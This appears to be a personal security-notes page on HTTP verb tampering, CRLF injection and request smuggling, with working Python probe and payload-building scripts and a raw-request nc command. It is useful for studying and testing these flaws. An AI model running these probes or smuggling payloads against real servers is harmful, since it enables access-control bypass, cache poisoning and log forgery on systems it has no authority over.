HTTP Requests

There are multiple ways to abuse HTTP requests.

HTTP Verb Tampering


If the web server is misconfigured or the code contains logic flaws, a request that is denied with the 'intended' method may be accepted when it is sent with another HTTP method.

  • Ex: A website expecting a POST request but reading its parameters through $_REQUEST (which also exposes GET parameters) may be injectable through GET (refer to Logic Flaws)

  • Ex: A website using .htaccess to require a password may be misconfigured, e.g. with a <Limit GET POST> block that only protects the listed methods, and bypassed by sending an unlisted method such as HEAD or PUT
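A quick check is to send the same path with every method and compare the status codes: a method that is not denied while others are is a verb-tampering candidate. The probe below is an added example (Python, not code from the original page); the host/port/path arguments and the fake responder are assumptions, and the fake emulates a `<Limit GET POST>` password rule so the script also runs offline.

```python
"""Probe a path with several HTTP methods and flag those that are not denied."""
import http.client

DENIED = {401, 403, 405}
METHODS = ("GET", "POST", "HEAD", "PUT", "DELETE", "PATCH", "OPTIONS", "TRACE",
           "FOO")  # FOO: does a made-up verb still reach the application?


def http_status(host, port, method, path, timeout=5):
    """Real transport: send one request and return only the status code."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request(method, path)
        return conn.getresponse().status
    finally:
        conn.close()


def probe_methods(path, send, methods=METHODS):
    """Call send(method, path) for every method. Returns (statuses, bypasses):
    bypasses lists methods that were NOT denied while at least one other method
    was, i.e. candidates for verb tampering (verify each one by hand)."""
    statuses = {m: send(m, path) for m in methods}
    denied = [m for m, s in statuses.items() if s in DENIED]
    bypasses = [m for m, s in statuses.items() if s not in DENIED] if denied else []
    return statuses, bypasses


def fake_limit_get_post(method, path):
    """Constructed stand-in for a server whose .htaccess protects /admin/ with
    '<Limit GET POST>': only the listed methods require credentials."""
    if path.startswith("/admin/") and method in ("GET", "POST"):
        return 401
    return 200


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 4:                # python3 verbs.py HOST PORT /path
        host, port, path = sys.argv[1], int(sys.argv[2]), sys.argv[3]
        send = lambda m, p: http_status(host, port, m, p)
    else:                                 # offline demo against the fake server
        path, send = "/admin/", fake_limit_get_post
    statuses, bypasses = probe_methods(path, send)
    for m, s in statuses.items():
        print(f"{m:8} {s}")
    print("not denied while others were:", bypasses)
```

A 200 on PUT or FOO only means the request reached something that answered; check the response body to see whether the application actually ran the protected code.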


HTTP CRLF Attack


CRLF Injection (getting \r\n into a header value or a log line) can be used for header injection/response splitting, request smuggling or log corruption. For instance, it may be used to insert forged log lines.
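The two cases side by side, as an added example (Python, not from the original page): a redirect whose Location header is built from user input, and a log line that embeds the requested path, each with its hardened form. The attacker value is constructed for the demo.

```python
"""CRLF injection: response splitting and log forging, with the fixes."""

CONSTRUCTED_INPUT = "/home\r\nSet-Cookie: session=attacker\r\n"  # constructed attacker value


def header_value_is_safe(value):
    """True unless the value carries CR, LF or NUL, which would end the header."""
    return not any(c in value for c in ("\r", "\n", "\0"))


def redirect_unsafe(location):
    """Vulnerable: user-controlled value concatenated straight into a header."""
    return f"HTTP/1.1 302 Found\r\nLocation: {location}\r\nContent-Length: 0\r\n\r\n"


def redirect_safe(location):
    """Hardened: reject control characters instead of writing them out."""
    if not header_value_is_safe(location):
        raise ValueError("CR/LF in header value")
    return redirect_unsafe(location)


def response_headers(raw):
    """What a client sees: (lowercase name, value) pairs of the response head."""
    head = raw.split("\r\n\r\n", 1)[0]
    return [(n.strip().lower(), v.strip()) for n, _, v in
            (line.partition(":") for line in head.split("\r\n")[1:])]


def log_entry_unsafe(client_ip, path):
    """Vulnerable: a newline in the path forges a second log line."""
    return f"{client_ip} {path}\n"


def log_entry_safe(client_ip, path):
    """Hardened: escape CR/LF so one request is always exactly one line."""
    cleaned = path.replace("\r", "\\r").replace("\n", "\\n")
    return f"{client_ip} {cleaned}\n"


if __name__ == "__main__":
    print(response_headers(redirect_unsafe(CONSTRUCTED_INPUT)))  # injected Set-Cookie appears
    print(repr(log_entry_unsafe("10.0.0.1", "/x\n127.0.0.1 GET /admin 200")))
    print(repr(log_entry_safe("10.0.0.1", "/x\n127.0.0.1 GET /admin 200")))
```

In the unsafe redirect the injected CRLF also pushes the server's own Content-Length header into the body, which is what makes the response boundary movable.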

HTTP Request Smuggling


Request Smuggling occurs when a request that the load balancer/reverse proxy (front-end) saw as one request is interpreted as two by the back-end.

When both Content-Length (CL) and Transfer-Encoding (TE) are present, each hop may determine the end of the request body differently, and the bytes one hop treats as body become the beginning of the next request for the other.

📚 Usage: evade firewalls/WAF rules, cache poisoning, etc.

HTTP Body Size
  • Content-Length: size of the body in bytes
  • Transfer-Encoding: chunked: body sent as a sequence of chunks, each prefixed with its size in hex and ended by a zero-size chunk
...
Transfer-Encoding: chunked

e              // chunk size in hex (14)
Hello, World!  // chunk data (13 bytes + 1 for \n), followed by CRLF
0              // zero-size chunk: end of body
  • CL.TE: front-end uses CL, back-end uses TE. Set Content-Length to cover the whole body and start the body with a 0 chunk; everything after it is read by the back-end as the start of the next request.
  • TE.CL: front-end uses TE, back-end uses CL. Put the smuggled request inside a chunk and set Content-Length to the length of the chunk-size line (the hex digits plus the 2 CRLF bytes), so the back-end stops right before the chunk data. The smuggled request inside the chunk does not need a TE header.
  • TE.TE: both hops support TE; send the header twice with an obfuscated value for the second one, e.g. Transfer-Encoding: chunked1. One hop may still treat the request as chunked while the other ignores the header and falls back to CL.
  • CL.CL: try two CL headers, the first with size 0 (most servers reject duplicate CL, so this rarely works).

📚 For old ATS servers, a \0 in a header value or long header values (65536+ bytes) may do the trick too.

📚 ATS uses CL (👻). Nginx uses TE (👻).
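To see how the same bytes are framed differently, here is a toy model of two hops, one that trusts Content-Length first and one that trusts Transfer-Encoding first, fed the CL.TE, TE.CL and TE.TE payloads described above. This is an added example (Python, not from the original page and not the behaviour of any particular server); the Host 'target' and the smuggled `GET /admin` request are assumptions, and the parser is deliberately minimal (no validation beyond what is needed to find the end of the body).

```python
"""Toy model of two HTTP hops framing the same bytes differently (added example)."""


def parse_head(buf, pos):
    """Parse request line + headers at buf[pos]. Returns (request_line, headers,
    body_start) with lower-cased names, last duplicate winning; None if incomplete."""
    end = buf.find(b"\r\n\r\n", pos)
    if end == -1:
        return None
    lines = buf[pos:end].split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, end + 4


def chunked_body_end(buf, start):
    """Walk chunks from buf[start]; return the offset just past the terminating
    '0' chunk and its empty trailer, or None if bytes are still missing."""
    pos = start
    while True:
        nl = buf.find(b"\r\n", pos)
        if nl == -1:
            return None
        size = int(buf[pos:nl].split(b";")[0], 16)  # hex size, chunk extensions ignored
        pos = nl + 2 + size + 2                      # size line, data, trailing CRLF
        if size == 0:
            return pos


def uses_chunked(headers, strict):
    """Strict hops require exactly 'chunked'; lenient ones also accept 'chunked1',
    'xchunked', ... which is what the TE.TE obfuscation relies on."""
    te = headers.get(b"transfer-encoding", b"")
    return te == b"chunked" if strict else b"chunked" in te


def split_requests(stream, prefer, strict_te=True):
    """Split a byte stream into requests as one hop would. prefer='cl' trusts
    Content-Length when present, prefer='te' trusts Transfer-Encoding when present.
    Returns ([(request_line, raw_body), ...], leftover_bytes)."""
    out, pos = [], 0
    while pos < len(stream):
        head = parse_head(stream, pos)
        if head is None:
            break
        request_line, headers, body_start = head
        chunked = uses_chunked(headers, strict_te)
        has_cl = b"content-length" in headers
        if chunked and (prefer == "te" or not has_cl):
            end = chunked_body_end(stream, body_start)
        elif has_cl:
            end = body_start + int(headers[b"content-length"])
        else:
            end = body_start
        if end is None or end > len(stream):
            break                                    # hop would wait for more bytes
        out.append((request_line, stream[body_start:end]))
        pos = end
    return out, stream[pos:]


HEAD = b"POST / HTTP/1.1\r\nHost: target\r\n"             # 'target' is a placeholder host
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: target\r\n\r\n"  # assumed smuggled request


def build_cl_te():
    """CL covers the whole body; a TE back-end stops at the '0' chunk and reads
    the rest as a new request."""
    body = b"0\r\n\r\n" + SMUGGLED
    return HEAD + b"Content-Length: %d\r\nTransfer-Encoding: chunked\r\n\r\n" % len(body) + body


def build_te_cl():
    """A TE front-end reads the whole chunk; CL is sized to cover only the
    chunk-size line, so a CL back-end starts the next request at the chunk data."""
    trailer = b"\r\n0\r\n\r\n"
    # The inner request carries its own CL so the back-end swallows the trailer.
    inner = b"GET /admin HTTP/1.1\r\nHost: target\r\nContent-Length: %d\r\n\r\n" % len(trailer)
    size_line = b"%x\r\n" % len(inner)
    return (HEAD + b"Content-Length: %d\r\nTransfer-Encoding: chunked\r\n\r\n" % len(size_line)
            + size_line + inner + trailer)


def build_te_te():
    """Same body as CL.TE, but the second TE header is obfuscated so a strict
    hop ignores chunking and falls back to Content-Length."""
    body = b"0\r\n\r\n" + SMUGGLED
    return (HEAD + b"Content-Length: %d\r\nTransfer-Encoding: chunked\r\n"
            b"Transfer-Encoding: chunked1\r\n\r\n" % len(body) + body)


if __name__ == "__main__":
    for name, payload in (("CL.TE", build_cl_te()), ("TE.CL", build_te_cl())):
        for hop in ("cl", "te"):
            reqs, rest = split_requests(payload, hop)
            print(f"{name} at a {hop.upper()}-first hop: {len(reqs)} request(s), {len(rest)} leftover byte(s)")
    for strict in (True, False):
        print("TE.TE at a", "strict" if strict else "lenient", "TE hop:",
              len(split_requests(build_te_te(), "te", strict)[0]), "request(s)")
```

Run against the front-end's framing each payload is one request; run against the back-end's framing it is two, the second being the smuggled GET. In a real attack the smuggled part is usually left incomplete so that the next user's request is appended to it.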


👻 To-do 👻

Stuff that I found but never read/used yet.

$ nc -q 1 IP PORT < request.txt   # send a raw request from a file; -q 1 quits 1 s after EOF on stdin
$ zaproxy                         # but uncheck the options that "fix" the request before sending it